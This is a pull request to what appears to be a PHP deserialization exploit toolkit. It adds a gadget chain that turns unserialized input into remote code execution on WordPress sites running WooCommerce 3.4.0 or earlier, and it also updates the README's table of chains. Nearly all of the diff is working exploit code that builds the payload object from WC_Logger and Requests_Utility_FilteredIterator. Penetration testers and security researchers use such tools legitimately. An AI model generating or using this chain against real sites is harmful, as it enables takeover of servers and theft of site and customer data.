### PR TITLE
Adapt WooCommerce RCE gadgetchain to version <=3.4

### DIFF
--- a/README.md
+++ b/README.md
@@ -63,6 +63,7 @@ WordPress/Guzzle/RCE2                     4.0.0 <= 6.4.1+                rce    
 WordPress/P/EmailSubscribers/RCE1         4.0 <= 4.4.7+                  rce              __destruct     *    
 WordPress/P/EverestForms/RCE1             1.0 <= 1.6.7+                  rce              __destruct     *    
 WordPress/P/WooCommerce/RCE1              3.4.0 <= 4.1.0+                rce              __destruct     *    
+WordPress/P/WooCommerce/RCE2              <= 3.4.0                       rce              __destruct     *    
 WordPress/P/YetAnotherStarsRating/RCE1    ? <= 1.8.6                     rce              __destruct     *    
 Yii/RCE1                                  1.1.20                         rce              __wakeup       *    
 ZendFramework/FD1                         ? <= 1.12.20                   file_delete      __destruct          

--- a/gadgetchains/WordPress/P/WooCommerce/RCE/2/chain.php
+++ b/gadgetchains/WordPress/P/WooCommerce/RCE/2/chain.php
@@ -1,0 +1,23 @@
+<?php
+
+namespace GadgetChain\WordPress\P\WooCommerce;
+
+class RCE2 extends \PHPGGC\GadgetChain\RCE
+{
+    public static $version = '<= 3.4.0';
+    public static $vector = '__destruct';
+    public static $author = 'Vincent Ulitzsch(@vinulium) and Pascal Zenker (@parzel2), based on WooCommerce RCE by erwan_lr';
+    public static $informations = '
+        Simple adaption of the gadgetchain demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763.
+        Original chain by erwan_lr.
+        Tested up to WP 5.1.1 and WooCommerce 3.4.0 activated (but not configured).
+    ';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \WC_Logger(new \Requests_Utility_FilteredIterator([$parameter], $function));
+    }
+}

--- a/gadgetchains/WordPress/P/WooCommerce/RCE/2/gadgets.php
+++ b/gadgetchains/WordPress/P/WooCommerce/RCE/2/gadgets.php
@@ -1,0 +1,15 @@
+<?php
+
+require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
+
+// WooCommerce - https://plugins.trac.wordpress.org/browser/woocommerce/trunk/includes/log-handlers/class-wc-log-handler-file.php
+class WC_Logger
+{
+    private $_handles;
+
+    // Custom constructor to set the $handles more easily
+    public function __construct($handles)
+    {
+        $this->_handles = $handles;
+    }
+}


### PR DESCRIPTION
This PR written by @parzel and me adds an adapted version of the WooCommerce RCE gadgetchain
to work with WooCommerce version prior to 3.4, using the class WC_Logger
instead of WC_Log_Handler_File.